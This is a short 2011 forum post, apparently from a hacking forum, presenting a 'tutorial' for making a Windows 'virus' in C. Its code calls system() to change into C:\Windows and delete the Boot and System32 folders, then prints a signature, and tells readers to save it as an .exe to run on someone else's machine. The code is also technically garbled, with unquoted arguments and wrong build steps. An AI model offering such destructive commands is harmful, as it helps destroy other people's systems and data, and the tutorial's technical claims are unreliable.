Login Register






how to make an virus for windows filter_list
Author
Message
how to make an virus for windows #1
Hello.
In this tutorial ill show u how to make an virus in cmd for windows.
Download DEV C++ or anything else what can Compil C
Than type:
system(cd C:\Windows);
system(del Boot);
system(del System32);
printf("Virus by oc1d0n\n");




and save this as .exe file
DONT OPEN THIS ON YOUR PC

Note: This is my first TutorialBiggrin
(This post was last modified: 09-10-2011, 07:39 AM by Razzy.)

Reply